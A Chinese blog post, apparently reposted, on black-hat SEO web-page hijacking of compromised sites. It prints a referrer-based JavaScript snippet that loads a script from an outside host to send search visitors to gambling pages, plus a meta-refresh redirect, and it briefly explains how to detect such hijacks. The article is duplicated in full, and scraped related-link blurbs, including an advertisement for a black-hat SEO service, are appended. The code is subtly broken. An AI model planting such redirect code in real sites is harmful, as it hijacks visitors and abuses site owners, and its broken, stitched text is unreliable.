黑帽SEO-网页劫持
网页劫持是目前黑帽SEO或者说黑产最喜欢的一种网页引流方式,此手法往往通过入侵政府、教育机构网站(权重高),修改网站源代码、放寄生虫程序、设置二级目录反向代理等实现。网页劫持可以分为服务端劫持、客户端劫持、百度快照劫持、百度搜索劫持等等;表现形式可以是劫持跳转,也可以是劫持呈现的网页内容,目前被广泛应用于私服、博彩等暴利行业。
服务端劫持
服务端劫持也称为全局劫持,手法为修改网站动态语言文本,判断访问来源控制返回内容,从来达到网站劫持的目的。
asp/aspx/php劫持
Global.asa、Global.asax、conn.asp、conn.php等文件比较特殊,作用是在每次执行一个动态脚本的时候,都会先加载该脚本, 然后再执行目标脚本。所以只要在 Global.asa 中写判断用户系统信息的代码(访问来源等),如果是蜘蛛访问则返回关键词网页(想要推广的网站),如果是用户访问,则返回正常页面。
客户端劫持
客户端劫持的手法也很多,但主要就是2种:js劫持、Header劫持。
js劫持
js劫持目的:通过向目标网页植入恶意js代码,控制网站跳转、隐藏页面内容、窗口劫持等。
js植入手法:可以通过入侵服务器,直接写入源代码中;也可以写在数据库中,因为有些页面会呈现数据库内容。
js劫持案例
效果:通过搜索引擎搜索点击页面(执行一段js)跳转到博彩页面;直接输入网址访问网页,跳转到404页面。
代码:
today=new Date(); today=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate(); var regexp=//.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(/.[a-z0-9/-]+){1,2}///ig; var where =document.referer; if(regexp.test(where)){ document.write ('<script language="javascript" type="text/javascript" src="http://www.xxx.com/test.js"></script>'); } else { window.location.href="../../404.htm"; }
分析:通过referer判断来路,如果referer来路为空就是跳转到404页面,如果是搜索引擎来的referer里面也会有显示,然后在写代码控制跳转。如果只是控制实现显示不同的内容,可以修改php、asp代码;如果需要劫持搜索引擎搜索框,可以写JS代码来做浏览器本地跳转。当然js功能可以无限扩展,比如可以控制一个ip一天内第一次访问正常,其余访问跳转等等。
header劫持
在源代码中写入以下代码:
<meta http-equiv=“refresh“ content=“10; url=http://www.xksafe.com“>
利用的就是Meta Refresh Tag(自动转向),将流量引走。
手法对比
客户端劫持与服务端区别
客户端劫持:每次访问网页从服务端获取到的网页代码都是相同的,只是控制了网页代码在浏览器中呈现的效果(比如是否进行跳转等)。
服务端劫持:改变了每次访问网页从服务端获取到的网页代码。
客户端劫持与服务端判断方法
客户端劫持的判断方法:只需观察浏览器呈现的网页前端代码,查看是否引用了不当的js,或者其它敏感内容。
服务端劫持的判断方法:可以通过观察网站后端代码,或者通过改变ip,包头等方式,观察放回源码是否不同。
结语: 网页劫持的方法还有很多,我了解的大概只是皮毛,黑帽SEO技术的水很深,前路漫漫。
网页劫持是目前黑帽SEO或者说黑产最喜欢的一种网页引流方式,此手法往往通过入侵政府、教育机构网站(权重高),修改网站源代码、放寄生虫程序、设置二级目录反向代理等实现。网页劫持可以分为服务端劫持、客户端劫持、百度快照劫持、百度搜索劫持等等;表现形式可以是劫持跳转,也可以是劫持呈现的网页内容,目前被广泛应用于私服、博彩等暴利行业。
服务端劫持
服务端劫持也称为全局劫持,手法为修改网站动态语言文本,判断访问来源控制返回内容,从来达到网站劫持的目的。
asp/aspx/php劫持
Global.asa、Global.asax、conn.asp、conn.php等文件比较特殊,作用是在每次执行一个动态脚本的时候,都会先加载该脚本, 然后再执行目标脚本。所以只要在 Global.asa 中写判断用户系统信息的代码(访问来源等),如果是蜘蛛访问则返回关键词网页(想要推广的网站),如果是用户访问,则返回正常页面。
客户端劫持
客户端劫持的手法也很多,但主要就是2种:js劫持、Header劫持。
js劫持
js劫持目的:通过向目标网页植入恶意js代码,控制网站跳转、隐藏页面内容、窗口劫持等。
js植入手法:可以通过入侵服务器,直接写入源代码中;也可以写在数据库中,因为有些页面会呈现数据库内容。
js劫持案例
效果:通过搜索引擎搜索点击页面(执行一段js)跳转到博彩页面;直接输入网址访问网页,跳转到404页面。
代码:
today=new Date(); today=today.getYear()+"-"+(today.getMonth()+1)+"-"+today.getDate(); var regexp=//.(sogou|so|haosou|baidu|google|youdao|yahoo|bing|gougou|118114|vnet|360|ioage|sm|sp)(/.[a-z0-9/-]+){1,2}///ig; var where =document.referer; if(regexp.test(where)){ document.write ('<script language="javascript" type="text/javascript" src="http://www.xxx.com/test.js"></script>'); } else { window.location.href="../../404.htm"; }
分析:通过referer判断来路,如果referer来路为空就是跳转到404页面,如果是搜索引擎来的referer里面也会有显示,然后在写代码控制跳转。如果只是控制实现显示不同的内容,可以修改php、asp代码;如果需要劫持搜索引擎搜索框,可以写JS代码来做浏览器本地跳转。当然js功能可以无限扩展,比如可以控制一个ip一天内第一次访问正常,其余访问跳转等等。
header劫持
在源代码中写入以下代码:
<meta http-equiv=“refresh“ content=“10; url=http://www.xksafe.com“>
利用的就是Meta Refresh Tag(自动转向),将流量引走。
手法对比
客户端劫持与服务端区别
客户端劫持:每次访问网页从服务端获取到的网页代码都是相同的,只是控制了网页代码在浏览器中呈现的效果(比如是否进行跳转等)。
服务端劫持:改变了每次访问网页从服务端获取到的网页代码。
客户端劫持与服务端判断方法
客户端劫持的判断方法:只需观察浏览器呈现的网页前端代码,查看是否引用了不当的js,或者其它敏感内容。
服务端劫持的判断方法:可以通过观察网站后端代码,或者通过改变ip,包头等方式,观察放回源码是否不同。
转载于:https://www.cnblogs.com/laofanshu/p/7041064.html
黑帽SEO-网页劫持相关推荐
- seo黑帽劫持用的php,黑帽seo劫持程序,js劫持搜索引擎代码
今天在浏览网页时无意中发现了这段JS劫持搜索引擎代码.劫持搜索引擎正常搜索过来的流量,这是黑帽seo常用的劫持方法.特意解密出来供大家了解其劫持原理. 源码打印帮助 var _$ = ["g ...
- 黑帽SEO之搜索引擎劫持
HTTP应用:黑帽SEO之搜索引擎劫持 SEO–搜索引擎优化 SEO(search engine optimization)即为搜索引擎优化.简单的说,就是让网站的排名更高,搜索"网络安 ...
- seo黑帽劫持用的php,php实现屏蔽掉黑帽SEO的搜索关键字
相信很多站长遇到过这种情况:网站内的搜索功能被不良分子利用,通过在站内搜索框中不断搜索敏感关键词,产生一大批TITLE上带有敏感关键词的垃圾搜索结果页(如下图).由于Baiduspider对每个站点的 ...
- js计算排名_今天,我们讲一下,快速排名与黑帽SEO
做个有心人(第7篇) 在Web3.0时代,想要获得流量,就必须使用广告手段,用什么广告手段,需要切合自身情况来做,比如说:SEO是免费的,而SEM就是付费的.而SEO快速排名是什么鬼?真的快吗?快速排 ...
- 夜猫专业黑帽seo优化服务团队
黑帽seo,黑帽优化,黑帽站群,黑帽劫持,黑帽seo优化,黑帽seo劫持,黑帽seo团队,专业黑帽seo服务团队 专业黑帽seo优化团队 QQ:2796651637 笼统的说,所有使用作弊手段或可疑手 ...
- 站群服务器金手指排名稳定,黑帽seo手法使用金手指:黑帽SEO,常见的SEO作弊手...
基本上是每一个SEO工作人员,都深层关心的事儿,但大家都了解,SEO是一个长周期的全过程,尽管,有一些白帽子秒排策略,但它挺大水平上借助于关键字市场竞争度. 它并并不是今日的重中之重,在今后的共享中, ...
- 做seo必须要懂得的技术:黑帽seo和白帽seo的几点
SEO白帽和黑帽的常见手法和区别. SEO由英文Search Engine Optimization缩写而来, 中文意译为"搜索引擎优化".SEO是指从自然搜索结果获得网站流量的技 ...
- 黑帽SEO主要作弊方法
在这里介绍黑帽,并且说黑帽不一定是不道德的事,并不意味着鼓励大家使用黑帽.恰恰相反,对一个正常的商业网站和大部分个人网站来说,做好内容,正常优化,关注用户体验,才是通往成功之路. 要做好白帽也必须了解 ...
- 黑帽SEO人员是如何对网站优化的【认准SEO黑帽大牛】
黑帽SEO大牛告诉你:想学网站SEO优化的百种法则你必须了解,这些SEO规则就像是交通指示灯一样,按照这些SEO规则走的,排名肯定会好,不按套路走的,除了快排只有死路一条.本文章句句精炼,不用深入剖析 ...
- 什么是黑帽SEO,哪些属于黑帽技术?
黑帽SEO技术是相对于白帽SEO技术而言的,从表面语义也可已看出,黑帽SEO就是通过作弊手段来实现自己的利益,如:提高自己网站排名.权重和流量.降低目标网站的排名权重和流量. 显而易见白帽SEO就是通 ...
最新文章
- 全息技术“量子飞跃”或彻底改变成像技术
- android 过度绘制
- arcgis栅格计算器python教程_ArcGIS栅格计算器
- Search For Mafuyu dfs,树的遍历,期望(济南)
- VC批量拷贝,移动,删除文件---SHFileOperation
- php渲染视图,Laravel 视图渲染:Blade 模板引擎
- Android 使用代码设置selector 的图片或文字颜色
- Struts2.x教程(一) Struts2介绍
- IHookHelper的用法
- Netcore webservice
- 报错:libtool: Version mismatch error. This is libtool 2.4.6解决
- H5+个推实现消息推送服务
- Struts2 标签
- 转:PHP - .htaccess设置显示PHP错误
- win10查看电脑已连接过的无线密码
- python爬取今日头条图片
- centos图像界面和dos界面之间切换
- Google Sheet 学习笔记
- 基于ssm的养老智慧服务平台毕业设计源码071526
- 视频教程-2019年人工智能热门案例精讲之P图美化照片-深度学习